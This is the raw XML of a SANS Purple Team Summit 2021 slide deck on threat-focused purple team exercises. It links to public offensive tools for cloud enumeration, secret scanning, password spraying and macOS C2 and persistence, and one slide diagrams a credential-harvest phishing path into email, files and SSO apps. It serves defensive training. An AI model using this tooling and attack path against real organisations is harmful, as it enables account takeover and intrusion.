Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/0xsha/CloudBrute" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/dxa4481/truffleHog" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/initstring/cloud_enum" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/michenriksen/gitrob" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto7.wdp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/zricethezav/gitleaks" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/dafthack/PowerMeta" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image45.tiff"/></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tiff"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto8.wdp"/></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dafthack/MSOLSpray" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto2.wdp"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/byt3bl33d3r/SprayingToolkit"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6.tiff"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/cedowens/oktaspraye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tiff"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto9.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0.wdp"/></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6.png"/><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dafthack/DomainPasswordSpray" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto11.wdp"/></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8.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image52.tiff"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image47.tiff"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.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49.tiff"/><Relationship Id="rId9" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto12.wdp"/></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tiff"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto13.wdp"/></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39.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tiff"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image56.tiff"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image55.tiff"/></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8.tiff"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto14.wdp"/></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tiff"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto12.wdp"/></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5.wdp"/></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tiff"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.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6.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image60.jpe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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/cedowens/MacC2" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cedowens.medium.com/macos-gatekeeper-bypass-2021-edition-5256a2955508" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/D00MFist/PersistentJXA" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/red-teaming-with-a-blue-team-mentality/purple-team-candidates-for-modern-tech-environments-69a78a125d38" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/cedowens/Persistent-Swift" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto2.wdp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/its-a-feature/Mythic" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/cedowens/Swift-Attack" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/cedowens/C2_Cradl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2.xml"/><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6.wdp"/></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microsoft.com/office/2007/relationships/hdphoto" Target="../media/hdphoto4.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8.jpe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9.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10.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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image16.tiff"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.tiff"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image26.tiff"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image34.tiff"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image29.tiff"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image15.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20.tiff"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image25.tiff"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image33.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image24.tiff"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image28.tiff"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/themeOverride" Target="../theme/themeOverride5.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.tiff"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image19.tiff"/><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tiff"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image31.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image18.tiff"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image27.tiff"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image12.tiff"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17.tiff"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22.tiff"/><Relationship Id="rId22"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3159-544C-3D48-8911-04589ED6F750}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1499287" y="2036763"/>
            <a:ext cx="9144000" cy="2387600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Threat Focused </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Purple</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Team Exercises (non-AD Edition)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29759908-3F12-5C47-BBC6-9FD151A6807B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5423048"/>
            <a:ext cx="9144000" cy="1655762"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00DCE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cedric Owens</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00DCE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SANS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4EEBFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Purple</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00DCE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Team Summit 2021</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00DCE9"/>
                </a:solidFill>
              </a:rPr>
              <a:t>May 2021</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 4" descr="Cyber Security Training | SANS Courses, Certifications &amp; Research">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C191936-F2ED-E047-B680-D04D906C5A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980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DD8B-B9D0-F64C-A266-FD538C4944A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1450392" y="304927"/>
            <a:ext cx="9291215" cy="1049235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4EEBFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cred Harvest Phishing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50B73E63-B198-194C-8A92-9701EFD634A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18843" y="1406663"/>
            <a:ext cx="11881294" cy="4185673"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="4" name="Straight Arrow Connector 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A417F7D-9697-9947-B2FC-615C6705597A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2053287" y="3305670"/>
            <a:ext cx="1909923" cy="0"/>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10A4D42-B9A4-194B-9835-492D305839B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2094586" y="3418865"/>
            <a:ext cx="1688616" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cred Harvest</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="TextBox 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C147735E-4A64-3140-8D51-ADA2C4503F3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4023880" y="2435869"/>
            <a:ext cx="1688616" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Federated Login</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="TextBox 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29B43C95-9B0A-D448-B2D1-B4292967E8EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6789933" y="3124580"/>
            <a:ext cx="2219595" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="EF40ED"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Email access</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="TextBox 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2ED08CE3-0868-D544-B2D5-E11847B6C9E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6789932" y="3584022"/>
            <a:ext cx="2219595" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="4EEBFF"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>File Access</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="TextBox 44">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44326CB1-DB0D-D946-81E3-6DFF75FC9584}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6789931" y="4043464"/>
            <a:ext cx="2219595" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050">
            <a:solidFill>
              <a:srgbClr val="EF40ED"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Various other okta tiles (salesforce, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>GApps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, Slack, etc.)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="A picture containing sunset, yellow, sun, orange&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE5C996C-E318-D544-B09D-3D17715832F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="148287" y="2922969"/>
            <a:ext cx="1905000" cy="106680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945B75F2-6526-EA42-A3F5-6496F2B0C74C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4004599" y="4214205"/>
            <a:ext cx="1968500" cy="1028700"/>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5F4750AC-5DF1-D84C-AA7A-31A9E58ADB01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4093859" y="3029155"/>
            <a:ext cx="1765300" cy="1143000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="33" name="Straight Arrow Connector 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B62CBEEA-CD6F-0A4D-BDBF-5C169E746CD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5872986" y="3358483"/>
            <a:ext cx="743786" cy="0"/>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3582AA7-AFFC-CC4E-97CC-B7A5689C2171}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6838781" y="2433338"/>
            <a:ext cx="1688616" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Initial Foothold</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="42" name="Straight Arrow Connector 41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{844BAA5A-B443-7E48-9327-E4CA8DCB4A2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="9009526" y="2433338"/>
            <a:ext cx="1207900" cy="875908"/>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7DD35ED-0973-0143-97E9-6770B90CA2CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9631809" y="1973896"/>
            <a:ext cx="2219595" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="4EEBFF"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Internal Phishing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="47" name="Straight Arrow Connector 46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BF622F3-A322-7545-B3CA-B5CEBA8D438F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9117496" y="3867029"/>
            <a:ext cx="1553352" cy="229778"/>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A24A4DC-1A8D-9D45-A5D5-74074567D172}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="9068712" y="4172155"/>
            <a:ext cx="1602136" cy="428580"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">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FB79279-E61C-6244-A665-24D73F5D940A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10670850" y="3143013"/>
            <a:ext cx="1402448" cy="2031325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="22225">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>May lead to objectives without even needing to access a host</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Picture 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D39073A-3EE9-1F4A-95E9-389D36E21E05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
